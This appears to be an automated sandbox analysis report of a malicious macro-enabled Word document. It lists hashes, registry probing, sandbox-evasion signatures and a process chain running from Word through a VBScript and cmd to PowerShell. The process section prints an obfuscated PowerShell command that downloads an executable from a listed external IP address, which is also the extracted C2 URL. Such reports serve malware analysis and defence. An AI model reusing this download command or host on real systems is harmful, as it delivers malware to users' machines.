Analysis
-
max time kernel
87s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
21-05-2022 12:14
Static task
static1
Behavioral task
behavioral1
Sample
cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
Resource
win10v2004-20220414-en
General
-
Target
cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm
-
Size
89KB
-
MD5
b52f6306e6c5af7bd87fab6f32a937b9
-
SHA1
e7043e9907b332b9039eeb4487959d10e05d2dc0
-
SHA256
cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4
-
SHA512
0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb
Malware Config
Extracted
http://62.108.35.164/api.php
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
explorer.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4004 3488 explorer.exe WINWORD.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 48 3596 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 1652 timeout.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Modifies registry class 1 IoCs
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings explorer.exe -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3488 WINWORD.EXE 3488 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3596 powershell.exe 3596 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3596 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
WINWORD.EXEpid process 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE 3488 WINWORD.EXE -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WINWORD.EXEexplorer.exeWScript.execmd.exedescription pid process target process PID 3488 wrote to memory of 4004 3488 WINWORD.EXE explorer.exe PID 3488 wrote to memory of 4004 3488 WINWORD.EXE explorer.exe PID 100 wrote to memory of 3796 100 explorer.exe WScript.exe PID 100 wrote to memory of 3796 100 explorer.exe WScript.exe PID 3796 wrote to memory of 760 3796 WScript.exe cmd.exe PID 3796 wrote to memory of 760 3796 WScript.exe cmd.exe PID 760 wrote to memory of 3596 760 cmd.exe powershell.exe PID 760 wrote to memory of 3596 760 cmd.exe powershell.exe PID 760 wrote to memory of 1652 760 cmd.exe timeout.exe PID 760 wrote to memory of 1652 760 cmd.exe timeout.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\explorer.exeexplorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs2⤵
- Process spawned unexpected child process
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\timeout.exeTIMEOUT /T 104⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\AsusSupport\KreuitrsfYRgryFVFt5.cmdFilesize
21KB
MD5197fd11428deaf8779c40b8aee37c023
SHA166d053c6349a994301ba6ec562c7e659f6e60e40
SHA2567ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8
SHA512ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4
-
C:\ProgramData\OIUTFuyFilesize
420B
MD512a0751c89b3b618b7c91cee7a231878
SHA12d546c942a6626826dc1d76d752cb6bb67546a94
SHA256c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc
SHA512aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3
-
C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbsFilesize
81KB
MD5d940788959fad6d9ec52674997f04457
SHA1c784384517d2c206c5423a8d58dee5d9ca9c6ffb
SHA25646b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646
SHA512802359aade02f39171298dd57dec02943af22aef5105c9e8e91959b71072258b3e2eff75eda0996c04ab7704ba829ec776f1a6f9673b95cf35a860a7859d5430
-
memory/760-146-0x0000000000000000-mapping.dmp
-
memory/1652-151-0x0000000000000000-mapping.dmp
-
memory/3488-135-0x00007FF823B00000-0x00007FF823B10000-memory.dmpFilesize
64KB
-
memory/3488-136-0x00007FF823B00000-0x00007FF823B10000-memory.dmpFilesize
64KB
-
memory/3488-137-0x000001609A390000-0x000001609A394000-memory.dmpFilesize
16KB
-
memory/3488-131-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-130-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-132-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-142-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-143-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-144-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-145-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-134-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3488-133-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmpFilesize
64KB
-
memory/3596-149-0x0000025977970000-0x0000025977992000-memory.dmpFilesize
136KB
-
memory/3596-148-0x0000000000000000-mapping.dmp
-
memory/3596-150-0x00007FF847690000-0x00007FF848151000-memory.dmpFilesize
10.8MB
-
memory/3796-140-0x0000000000000000-mapping.dmp
-
memory/4004-138-0x0000000000000000-mapping.dmp